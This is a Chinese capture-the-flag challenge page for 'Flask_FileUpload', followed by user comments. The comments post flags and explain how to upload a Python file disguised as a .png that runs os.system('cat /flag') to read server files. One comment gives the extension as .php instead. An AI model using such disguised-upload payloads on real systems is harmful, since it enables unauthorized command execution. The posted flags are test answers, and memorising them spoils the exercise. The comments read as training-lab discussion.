Flask_FileUploadWEB 未解决
分数:
10
金币:
3
题目作者:
valecalida
一 血:
⎝Lazzaro⎠
一血奖励:
3金币
解 决:
11821
提 示:
描 述:
Flask_FileUpload
评论
Wang_Micro 15天前
举报
flag{bf686c3799aa1aa32c4c8b025bba84a7}
tkStar 3月前
举报
先看源码,只检查了后缀是png,上传包含系统命令的python文件,后缀改成png就行
2808476708 3月前
举报
flag{abe11096bb1215a2a5f8696f4ab98f1f}
yvonne 3月前
举报
import os 换行 os.system()
1uxu4y 3月前
举报
flag{a04e45c0960f5413e9847ea5d666d5d5}
18835508637 3月前
举报
flag{8b6840315d0d9b357abeb8cfe1dbeb5a}
tot1987 4月前
举报
新建txt,输入: import os os.system('ls /') 保存为a.png,然后上传,发现根目录下有个flag, 然后在修改txt内容为: import os os.system('cat /flag') 保存后,再上传,在新页面中查看源码,得到flag
Chibits 4月前
举报
import os os.chdir('..') print(os.listdir('.')) os.system('cat flag')
不会写代码的菜鸟 4月前
举报
作为一个没学过python的小菜鸡,能告诉我为啥要import os吗?我还以为直接 LS cat /flag就可以
Life000 4月前
举报
因为python执行系统命令需要os这个库
q1152874733 4月前
举报
这个代码只检查文件后缀对不对,需要将python代码文件后缀改为php上传 并查看返回页面源代码 代码如下: import os os.system('cat /flag')